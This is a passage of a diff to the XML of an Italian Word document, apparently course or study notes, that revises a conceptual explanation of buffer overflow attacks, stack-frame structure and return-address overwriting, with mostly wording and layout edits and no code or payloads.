+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sulla propria macchina.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -968,7 +1059,21 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t xml:space="preserve">Lo scopo complessivo di un attacco di buffer overflow è di sovvertire la funzione di un programma privilegiato in modo che l'attaccante possa prendere il controllo di quel programma, e, se esso è sufficientemente privilegiato, controllare </w:t>
+        <w:t xml:space="preserve">Lo scopo </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>finale</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> di un attacco di buffer overflow è di sovvertire la funzione di un programma privilegiato in modo che l'attaccante possa prendere il controllo di quel programma e, se esso è sufficientemente privilegiato, controllare </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -984,7 +1089,21 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t>. Tipicamente lo scopo finale di un’attaccante è quello di ottenere una shell con i privilegi di root.</w:t>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Tipicamente,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> lo scopo finale di un’attaccante è quello di ottenere una shell con i privilegi di root.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2488,7 +2607,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:left="708" w:firstLine="708"/>
+        <w:ind w:firstLine="708"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
@@ -2503,7 +2622,25 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
         <w:t xml:space="preserve">Frame pointer </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2556,7 +2693,7 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0BEEDE47" wp14:editId="6E89D864">
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0BEEDE47" wp14:editId="31CBD1F6">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="column">
                   <wp:posOffset>4248150</wp:posOffset>
@@ -2614,7 +2751,11 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape w14:anchorId="5319A079" id="Connettore 2 14" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:334.5pt;margin-top:16.1pt;width:0;height:22.85pt;z-index:251669504;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin" o:gfxdata="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" strokecolor="black [3200]" strokeweight=".5pt">
+              <v:shapetype w14:anchorId="1EF3FA92" id="_x0000_t32" coordsize="21600,21600" o:spt="32" o:oned="t" path="m,l21600,21600e" filled="f">
+                <v:path arrowok="t" fillok="f" o:connecttype="none"/>
+                <o:lock v:ext="edit" shapetype="t"/>
+              </v:shapetype>
+              <v:shape id="Connettore 2 14" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:334.5pt;margin-top:16.1pt;width:0;height:22.85pt;z-index:251669504;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin" o:gfxdata="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" strokecolor="black [3200]" strokeweight=".5pt">
                 <v:stroke endarrow="block" joinstyle="miter"/>
               </v:shape>
             </w:pict>
@@ -2624,55 +2765,161 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">       </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Stack pointer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:sym w:font="Wingdings" w:char="F0E0"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>Stack growth</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:ind w:left="708" w:firstLine="708"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t xml:space="preserve">Stack pointer </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:sym w:font="Wingdings" w:char="F0E0"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:tab/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Struttura dello </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Stack</w:t>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>stack</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in memoria.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Quando viene esegui</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ta</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> una funzione all’interno del programma verrà automaticamente allocato in memoria </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">un blocco di memoria </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">chiamato </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2681,112 +2928,32 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>growth</w:t>
+        <w:t>stack</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="708" w:firstLine="708"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Struttura dello </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>stack</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> in memoria.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Quando viene eseguite una funzione all’interno del programma verrà automaticamente allocato in memoria </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">un blocco di memoria </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">chiamato </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>stack</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> frame, composto da quattro regioni principali:</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> frame, composto da </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>cinque</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> regioni principali:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2993,31 +3160,115 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:pStyle w:val="Standard"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Copiare e trasferire dati all’interno della memoria è un task estremamente comune all’interno dei programmi. Ma dato che un programma necessita di allocare la memoria prima di poterci scrivere, spesso succede che lo spazio allocato non è sufficiente a contenere tutti i dati che si ha intenzione di memorizzare, questo è detto overflow. Alcuni linguaggi di programmazione gestiscono questo problema in maniera automatica (tipo Java) mentre altri affidano il compito al programmatore (C e C++). Questo potrebbe portare a dei seri rischi di compromissione della sicurezza del sistema su cui si sta lavorando.</w:t>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Buffer:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> region</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>e di memoria dedicata al salvataggio dei dati della funzione.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Copiare e trasferire dati all’interno della memoria è un task estremamente comune all’interno dei programmi. Ma dato che un programma necessita di allocare la memoria prima di poterci scrivere, spesso succede che lo spazio allocato non è sufficiente a contenere tutti i dati che si ha intenzione di memorizzare, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">e </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">questo </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>viene definito come</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> overflow. Alcuni linguaggi di programmazione gestiscono questo problema in maniera automatica (tipo Java</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e Python</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>) mentre altri affidano il compito al programmatore (C e C++). Questo potrebbe portare a dei seri rischi di compromissione della sicurezza del sistema su cui si sta lavorando.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3069,7 +3320,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">esempio dovesse essere sovrascritto il Return </w:t>
+        <w:t xml:space="preserve">esempio </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">il Return </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3087,15 +3346,31 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> la funzione, una volta eseguita, non tornerà all’indirizzo di memoria predestinato</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> bensì ad uno nuovo.</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>del</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>la funzione</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, che se dovesse essere sovrascritto ciò permetterebbe di far tornare il sistema una volta terminata l’esecuzione della funzione ad un indirizzo diverso da quello predefinito. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3114,7 +3389,47 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Un attacco di tipo Buffer Overflow potrebbe quindi portare a far terminare un certo programma o ancora peggio prendere il controllo del programma o addirittura sistema stesso da parte dell’attaccante.</w:t>
+        <w:t>Un attacco di tipo Buffer Overflow potrebbe quindi portare a far terminare un certo programma o ancora peggio prendere il controllo del programma</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, e in certi casi </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>addirittura</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> del</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sistema stesso</w:t>
+      </w:r>
+      <w:r>
